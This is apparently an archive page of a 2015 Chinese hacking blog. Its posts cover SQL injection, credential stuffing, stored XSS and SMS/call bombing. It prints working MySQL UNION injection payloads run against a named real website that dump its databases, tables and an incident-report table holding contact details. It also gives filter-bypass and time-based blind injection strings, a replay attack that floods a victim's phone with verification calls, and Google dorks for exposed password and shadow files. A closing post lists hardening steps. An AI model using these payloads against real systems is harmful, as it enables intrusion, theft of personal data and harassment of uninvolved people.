月度归档:2015年05月

mysql暴库总结

1.判断版本 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询

2.猜解字段数目,

用order by也可以猜,

也可以用union select一个一个的猜解
and 2=4 union select 1,2,3,4,5,6,7,8,9–

3.查看数据库版本及当前用户,
and 2=4 union select 1,user(),version(),4,5,6,7,8,9–

数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,

4.判断有没有写权限
and (select count(*) from MySQL.user)>0–

返回错误,没有写权限

手动猜表

5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1

土耳其的手法
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns–

成功查出所有,国外的黑客就是不一般。数据库如下:
information_schema,Advisory,IR,mad,member,,twcert,vuldb,vulscandb

6.爆表,爆的是twcert库
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0×747763657274–

爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5

7.爆列名,这次爆的是irsys表
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0×6972737973–

爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status

8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys–
返回是3,说明每个列里有3个地段

9.爆字段内容
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1–

爆出name列的第一个字段的内容
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1–

爆出name列的第二个字段的内容

绕过07073waf遍历用户并撞库(附poc)

07073游戏网站waf设计缺陷导致可以绕过,接口可以遍历用户,并撞库
附上校验poc

1.注册接口暴力跑用户

数据展示:

admin00

admin000

admin0000

admin0001

admin0002

admin001

admin0011

admin002

admin0025

admin003

admin0032

admin004

admin005

admin0052

admin0060

admin007

admin0076

admin0077

admin008

admin009

admin0095

admin01

admin0101

admin0108

admin0123

admin0203

admin021

admin0216

admin0225

admin023

简单跑了一下就停了,有兴趣的可以继续跑

现给出poc:

继续阅读

某应用商城存储型XSS

某应用商城存在存储型XSS 各种弹窗 各种cookie

http://www.appstar.com.cn/ 应用之星-无需编码的手机应用开发平台-移动开发平台-Android、IOS应用开发

开发太粗心了..评论处可以各种插XSS..什么都没过滤我也是醉了

比如这里:http://www.appstar.com.cn/store/6791.htm?share_uid=2015042006636
 

继续阅读

mysql注入绕过空格过滤的方法

SQL注入时,空格的使用是非常普遍的。比如,我们使用union来取得目标数据:
http://www.xxx.com/index.php?id=1 and 0 union select null,null,null

上面的语句,在and两侧、union两侧、select的两侧,都需要空格。

1. 注释绕过空格

这是最基本的方法,在一些自动化SQL注射工具中,使用也十分普遍。在MySQL中,用
/*注释*/

来标记注释的内容。比如SQL查询:
select user() from dual

我们用注释替换空格,就可以变成:
select/**/user()/**/from/**/dual

如下图,SQL命令能够正确执行:
mysql注入绕过空格过滤的方法

2. 括号绕过空格

空格被过滤,但括号没有被过滤,可通过括号绕过。

我的经验是,在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。

括号绕过空格的方法,在time based盲注中,是屡试不爽的。

举例说明,我们有这样的一条SQL查询:
select user() from dual where 1=1 and 2=2

如何把空格减到最少?

观察到user()可以算值,那么user()两边要加括号,变成:
select(user())from dual where 1=1 and 2=2;

继续,1=1和2=2可以算值,也加括号,去空格,变成:
select(user())from dual where(1=1)and(2=2)

dual两边的空格,通常是由程序员自己添加,我们一般无法控制。所以上面就是空格最少的结果。
mysql注入绕过空格过滤的方法

这也是非常实用的一个技巧。

用我常用的一条time based盲注语句做个总结:
http://www.xxx.com/index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109))

这条语句是猜解user()第二个字符的ascii码是不是109,若是109,则页面加载将延迟。它:

1) 既没有用到逗号、大小于符号

2) 也没有使用空格

却可以完成数据的猜解工作!

饿了么手机验证可做电话轰炸(呼死你)

现在校园里一到吃饭的点就充斥着来来往往送外卖的小哥小妹,经不住诱惑的我也开始用饿了么,但让我生气的是有一个餐馆看生意太好竟然提高了外卖起送费,我对此非常不满。扯远了。。。由此展开了对饿了么手机端的检测,各种可能的问题,可能是我技术不到家,安全措施做的很好,愣是没找到一个有价值的,只找到这个手机轰炸。在点完餐后如果外卖手机号是新的的话,饿了么会提示进行电话验证,然后打来电话说验证码,截取这个过程的数据包如下:
饿了么手机验证可做电话轰炸(呼死你)

很明显这里存在校验位sig,这样的话修改数据就比较麻烦,那我就不修改了,直接填上目标手机号,进行重放攻击。经测试,只有间隔30秒的限制而没有次数限制。也就是搞个脚本重放刚才的数据目标手机就会每三十秒收到一个验证码电话,不关机咋办啊。。。。
饿了么手机验证可做电话轰炸(呼死你)
饿了么手机验证可做电话轰炸(呼死你)
饿了么手机验证可做电话轰炸(呼死你)
中间有时间差是因为出去吃了个饭。

解决方案:

关于这个漏洞增加手机号呼叫次数就好了。我自己是程序员,我有一个建议。饿了么目前的拼单只能使用好友进行拼单,建议增加功能,可以陌生人之间拼单,按照定位信息扫描周围购买同一家商家的用户,然后大家一起拼单。这样可以吸引那些想点外卖却又到不了起送费的用户,而商家也是送一次,这样互利三赢。
 

继续阅读

总结揭露黑客入侵网站的手法

现在的很猖狂啊,大家都知道网站是怎么被黑客入侵的吗?
 
刚才简单做了个调查,大家网站被入侵的情况发生得比较多,而且也有部分站长知道黑客是怎么入侵的,现在也有不少PHP站点也受到黑客的入侵,网上也有很多针对PHP渗透的各种工具。
 
那现在我们先来让大家知道黑客有哪些网站的入侵技术
 
sql注入的入侵
 
这种是ASP+ACCESS的网站入侵方式,通过注入点列出数据库里面管理员的帐号和密码信息,然后猜解出网站的后台地址,然后用帐号和密码登录进去找到文件上传的地方,把ASP木马上传上去,获得一个网站的WEBSHELL。
 
然后还有一种SQL注入漏洞的入侵方式,那就是ASP+MSSQL的网站入侵方式。 MSSQL通常会给用户分配一个帐号,帐号的权限分为三种sa,dbowner,public,sa权限最高,public最低。
 
以前有很多数据库都给SA权限 ,特别是一些韩国的网站,一扫一大把都是SA权限的,现在大部分网站都是给DBOWNER权限。
 
如果是SA权限的网站,注入点,那么可以直接用数据库的存储扩展XP_CMDSHELL来执行系统命令,建立一个系统帐号,然后通过3389登录进去。或者上传一个NC程序,然后用NC反连回来,获取一个远程的SHELL权限,当然利用SA注入点入侵的方法还有很多种,我这里就不一一讲解。
 
如果是DB_OWNER权限的话,那么就要用到差异化备份的技术来备份出一个WEBSHELL,这个前提是需要知道网站的绝对路径。然后还有一种方法就是利用DB_OWNER权限来列出数据库里面网站管理员的帐号和密码,然后登录到网站后台里面,看看有没有可利用的地方,比如上传文件,备份数据库之类的功能,然后利用漏洞上传ASP木马上去。这种登录后台的技术跟前面ASP+ACCESS的入侵方式很类似。
 
所以大家要清楚的是,黑客技术是一套一套的。比如有A,B,C是入侵技术的三个部分,还有A1,B1,C1是另外一种入侵技术的三个部分,那么根据实际情况,有可能会搭配进行,如可以用A,B1,C ,也可以用A1,B1,C,这样可以搭配出好几种入侵方式,所以黑客入侵是千变万化,大家要知道的是万变不离其中,黑客的目的就是要利用网站以及服务器可能存在的漏洞或者配置的错误来达到控制服务器和网站的目的。
 
现在再来讲解第三种黑客入侵技术
 
ASP上传漏洞的利用:这种技术方式是利用一些网站的ASP上传功能来上传ASP木马的一种入侵方式。不少网站都限制了上传文件的类型,一般来说ASP为后缀的文件都不允许上传,但是这种限制是可以被黑客突破的。黑客可以采取COOKIE欺骗的方式来上传ASP木马,获得网站的WEBSHELL权限。
 
前面我们讲到过,通过登录系统后台来进行入侵的技术,后台数据库备份方式获得WEBSHELL就是其中之一, 这个主要是利用网站后台对ACCESS数据库进行数据库备份和恢复的功能,备份数据库路径等变量没有过滤导致可以把任何文件的后缀改成ASP 。那么利用网站上传的功能上传一个文件名改成JPG或者GIF后缀的ASP木马,然后用这个恢复库备份和恢复的功能把这个木马恢复成ASP文件,从而达到能够获取网站WEBSHELL控制权限的目的。
 
下面来讲解网站旁注入侵技术:这种技术是通过IP绑定域名查询的功能查出服务器上有多少网站(转者注:可以上这里查询 http://www.zhongguocaidao.com/),然后通过一些薄弱的网站实施入侵,拿到权限之后转而控制服务器的其它网站。
 
我刚才不是用例子来形容入侵的三个过程吗?刚才讲的这个旁注应该算是入侵过程中的A ,一个入侵技术的整个流程应该是这样的:首先进行目标信息的收集,这个是A;然后对信息当中的漏洞进行利用,拿到一定的权限,并提升成为最高权限,这是B,被称为入侵实施;第三步就是要埋后门,以方便黑客下次进入;最后一步就是清除踪迹,让别人很难查到网站是怎么被入侵的额。
 
网站旁注入侵实质上是进行目标侦测的阶段,旁注是侦测手段,后面的入侵是入侵实施阶段。
 
好,我们现在再继续往下讲
 
提交一句话木马的入侵方式
 
这种技术方式是对一些数据库地址被改成asp文件的网站来实施入侵的。黑客通过网站的留言版,系统等功能提交一句话木马到里面,然后在木马客户端里面输入这个网站的数据库地址并提交,就可以把一个ASP木马写入到网站里面,获取网站的WEBSHELL权限。
 
然后现在网上有很多人用一些免费的论坛代码,网站代码,博客系统代码,这些免费的代码是很容易被黑客利用的,所以建议大家在用之前把相应的补丁都打上。
 
论坛漏洞利用入侵方式
 
这种技术是利用一些论坛存在的安全漏洞来上传ASP木马获得WEBSHELL权限,最典型的就是,动网6.0版本,7.0版本都存在安全漏洞,拿7.0版本来说,注册一个正常的用户,然后用抓包工具抓取用户提交一个ASP文件的COOKIE,然后用明小子之类的软件采取COOKIE欺骗的上传方式就可以上传一个ASP木马,获得网站的WEBSHELL。
 
GOGLE HACKing技术
 
这种技术方式是用GOOGLE来搜索一些存在安全漏洞的网站,我们简单列出GOOGLE的一些语法的使用方法:
 
intext:
 
这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:红盟.将返回所有在网页正文部分包含"红盟"的网页
 
.allintext:使用方法和intext类似.
 
intitle:
 
和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:红客.将返回所有网页标题中包含"红客"的网页.同理allintitle:也同intitle类似.
 
cache:
 
搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦.
 
define:
 
搜索某个词语的定义,搜索:define:hacker,将返回关于hacker的定义.
 
filetype:
 
这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的对特定目标进行信息收集都需要用到这个.搜索指定类型的文件.例如输入:filetype:
 
doc.将返回所有以doc结尾的文件URL.当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富:)
 
:filetype:doc.将返回所有以doc结尾的文件URL.当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富
 
info:
 
查找指定站点的一些基本信息.
 
inurl:
 
搜索我们指定的字符是否存在于URL中.例如输入:inurl:admin,将返回N个类似于这样的连接:http://www.xxx.com/xxx/admin,用来找管理员登陆的URL不错.allinurl也同inurl类似,可指定多个字符。
link:
 
例如搜索:inurl:www.jz5u.com可以返回所有和www.jz5u.com做了链接的URL.
 
site:
 
这个也很有用,例如:site:www.jz5u.com将返回所有和jz5u.com这个站有关的URL.
对了还有一些*作符也是很有用的:
 
+ 把google可能忽略的字列如查询范围
 
- 把某个字忽略
 
~ 同意词
 
. 单一的通配符
 
* 通配符,可代表多个字母
 
"" 精确查询
 
现在简单来讲解一些实例:
 
对于一些黑客来说,获取密码文件是他们最感兴趣的,那么可以在GOOGLE上搜索以下内容:
intitle:"index of" etc
intitle:"index of" passwd
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" master.passwd
intitle:"index of" htpasswd
 
这样就会有很多一些服务器的重要密码文件没有任何保护的暴露在网络上,黑客就会利用这些密码来获取系统的一些权限。
 
以上黑客通过WEB的入侵技术我们只是做了简单的介绍,目的是希望大家对黑客技术有一定的了解,但不希望大家利用这些技术来实施入侵。我想大家就很想知道对于这么多形形色色的入侵方式,有些什么好的防御方法
 
那下面我们就来讲讲怎样来防御基于WEB的各种攻击
 
好了,那我们现在来讲讲,我们怎么来做网站和服务器的安全防范工作
 
防范WEB入侵有两种方式,一种是用技术手段来防御攻击,另一种是用安全软件来防御攻击。
 
手动的方式来防范基于WEB的入侵
 
1 安装补丁
 
安装好操作系统之后,首先要做的就是要安装系统的各种补丁程序,配置好网络之后,如果是WIN 2000的操作系统就装上SP4,WIN 2003就安装好SP1,然后点击WINDOWS UPDATE,安装好所有关键的更新。
 
2 安装软件
 
杀毒软件我们现在主要推荐使用两款:卡巴斯基和瑞星。这两款杀毒软件我们做过N多测试,结果表明卡巴斯基的杀查能力要强过瑞星,很多做过免杀的木马过得了瑞星但是确逃不过卡巴斯基的法眼,当然卡巴斯基也不是百分百所有病毒都能查杀,一些木马程序也是能做出过卡巴斯基的免杀。只不过卡巴斯基在所有杀毒软件当中查杀能力还算是不错的。
 
3 设置端口的安全保护功能
 
端口保护的方式有两种,一种是TCP/IP筛选里面进行端口设置,另外一种系统自带的防火墙(我们以WINDOWS 2003操作系统为准,现在大部分的网站都使用的是WINDOWS 2003操作系统。)。
 
4 TCP/IP筛选的端口设置方式
 
在“网上邻居”上选右键点开“属性”,然后在“本地连接”上右键点开“属性”,选择“Internet协议(TCP/IP)”点“属性”,然后在弹出的“Internet协议(TCP/IP)属性”框里选择“高级”,然后在“高级TCP/IP设置”框里选择“选项”,然后选择“TCP/IP筛选”后点击“属性”,然后在弹出的“TCP/IP筛选”的框里勾上“启用TCP/IP筛选(所有适配器)”,选择只允许,然后点击添加你所需要开放的端口。
 
5 自带防火墙的端口设置
 
通过WINDOWS 2003操作系统自带的防火墙来进行端口设置比较灵活,不用重新启动服务器。我们开始设置,在“网上邻居”上选右键点开“属性”,然后在“本地连接”上右键点开“属性”,在弹出的框里选择“高级”,选择“Internet连接防火墙”点击设置,这样就会弹出“WINDOWS 防火墙”的框。我们选择“启用”,然后点“例外”,在这个里面我们可以选择“添加程序”和“添加端口”的方式来设置一些开放的端口。有一点需要特别注意,如果是远程连接服务器的,要注意远程虚拟终端的端口一定要开放。
 
6 目录的安全设置
 
包括系统盘在内的所有磁盘只给Administrators和SYSTEM的完全控制权限。
 
C: Documents and Settings 目录只给Administrators和SYSTEM的完全控制权限。
 
C: Documents and Settings All Users 目录只给 Administrators 组和 SYSTEM 的完全控制权限。C: Inetpub 目录及下面所有目录、文件只给 Administrators 组和 SYSTEM 的完全控制权限。C: Windows目录除了给Administrators和SYSTEM的完全控制权限之外,还需要给CREATOR OWNER用一个“特别的权限”,Power Users用户组除了完全控制之外的所有权限,Users用户组“读取和运行”,“列出文件夹目录”,“读取”的权限。C: Windows目录的这些权限设置是非常重要的,如果除了Administrators和SYSTEM的完全控制权限之外的那些权限没有设置,那么系统重启后,很多系统服务都不能正常使用。
 
C: Windows System32 cacls.exe、cmd.exe、net.exe,、net1.exe 文件只给 Administrators 组和 SYSTEM 的完全控制权限。
 
7 IIS控制帐号的权限分配
 
现在黑客的入侵技术当中,有一种技术叫网站旁注入侵,这种技术方式上面黑客入侵技术环节已经讲过了,是通过服务器里面一个有漏洞网站的来实施入侵,成功获取权限之后转而控制其它网站。那大家就想知道这个问题是由于什么原因导致的。原来IIS对于远程的普通用户访问是设置了一个专用的“IUSR_机器名”的帐号。那么正因为IIS用“IUSR_机器名”的帐号来管理所有网站访问权限,因此黑客就可以用到这种旁注入侵技术了。那么我们怎么来解决这个问题?很简单,我们给每个网站分别设置一个单独的IIS控制帐号,IIS控制帐号的权限设为GUESTS组就可以。这样即使黑客通过服务器的一个网站拿到权限,那他也只有这个网站的权限,服务器其它网站他都没有权限可以访问,黑客对服务器破坏的风险降低了,那么安全就相对提高了。
 
8 注入漏洞的修补以及上传文件类型的限制
 
这两个部分是各位网站程序员所必须关注的,黑客对网站实施入侵的过程中,80%会用到网站的注入点和上传漏洞来实施入侵。注入漏洞的修补可以使用网上一些现成的修补代码,如ASP通用防注入,防注入代码完美版等,但是我们还是建议网站程序员稍微花点时间自己来写防注入代码,这样会比较安全可靠。上传文件类型的限制这个写起来也不难,只允许用户上传你们网站所要用到的文件类型,限制好文件类型,特别不要让ASP,ASA等扩展名的文件上传上来,然后对文件的头文件进行一个检查,发现有ASP木马特征的就限制上传。当然,现在的黑客越来越聪明,ASP木马大部分都使用一句话木马,然后还会对代码进行各种各样的变形处理来逃过网站的限制以及杀毒软件的查杀。对于这些免杀技术的木马用ASP代码的方式很难防范,最好使用安全产品来进行防御。
 
9 SQL权限的安全设置
 
ASP+MSSQL是黑客最感兴趣的网站,通常黑客能很轻松的利用MSSQL的漏洞拿到权限,因此这一块是大家要加以重视。
 
首先系统安装的时候,尽量不要默认安装到c: Program files目录里面,然后安装好之后要打好SQL数据库最新的补丁程序。然后数据库不要放在默认的位置,接下来就要看网站是否需要远程登录sql服务器,我们建议能不用远程就不要用,如果必须使用的话,那建议大家可以把端口改成一个高端端口,这样黑客很难找到。
 
在做好安全安装的工作之后,就要把SA设置一个复杂的密码,然后把SQL里面的BUILTIN Administrators用户组删除,这样是避免黑客以WINDOWS身份登录SQL。接着在企业管理器里面编辑SQL Server注册属性,选择使用“使用SQL Server身份验证”并勾选“总是提示输入登录名和密码”。
 
然后在增加用户的时候,只给public和db_owner权限。
 
添加用户
exec sp_addlogin 'abc'
 
使它变为当前数据库的合法用户
exec sp_grantdbaccess N'abc'
 
授予abc用户对数据库的db_owner权限
exec sp_addrolemember N'db_owner', N'abc'
 
最后我们就要删除一些黑客常用到的调用SHELL,操作注册表,调用COM组件的权限。
打开查询分析器,输入:
use master
EXEC sp_dropextendedproc 'xp_cmdshell'
EXEC sp_dropextendedproc 'Sp_OACreate'
EXEC sp_dropextendedproc 'Sp_OADestroy'
EXEC sp_dropextendedproc 'Sp_OAGetErrorInfo'
EXEC sp_dropextendedproc 'Sp_OAGetProperty'
EXEC sp_dropextendedproc 'Sp_OAMethod'
EXEC sp_dropextendedproc 'Sp_OASetProperty'
EXEC sp_dropextendedproc 'Sp_OAStop'
EXEC sp_dropextendedproc 'Xp_regaddmultistring'
EXEC sp_dropextendedproc 'Xp_regdeletekey'
EXEC sp_dropextendedproc 'Xp_regdeletevalue'
EXEC sp_dropextendedproc 'Xp_regenumvalues'
EXEC sp_dropextendedproc 'Xp_regread'
EXEC sp_dropextendedproc 'Xp_regremovemultistring'
EXEC sp_dropextendedproc 'Xp_regwrite'
drop procedure sp_makewebtask
 
点击菜单上“查询”里面的“执行”,这样就可以把这些会被黑客利用的权限删除掉。
 
安全软件防御WEB攻击
 
端口以及系统漏洞扫描器:XSCAN扫描器
 
由黄鑫同志开发的国内最好用的扫描器,可以探测系统开放端口的情况,然后还可以对端口提供的服务安全进行探测,能探测FTP,MAIL,SQL等服务的帐号和密码,是一款不可多得的安全扫描探测产品。
 
WEB漏洞扫描器:红黑联盟明小子旁注3.5
 
黑客们用得最多的WEB漏洞扫描以及入侵工具,当然我们也可以用来探测我们自己服务器网站的安全状况,它能够扫描网站的注入漏洞和上传漏洞以及探测网站的后台地址等信息。
 
木马查杀工具:冰刃IceSword
 
冰刃 IceSword是一斩断黑手的利刃,它适用于Windows 2000/XP/2003 操作系统,其内部功能是十分强大,用于查探系统中的幕后黑手-木马后门,并作出处理。可能您也用过很多类似功能的软件,比如一些进程工具、端口工具,但是现在的系统级后门功能越来越强,一般都可轻而易举地隐藏进程、端口、注册表、文件信息,一般的工具根本无法发现这些“幕后黑手”。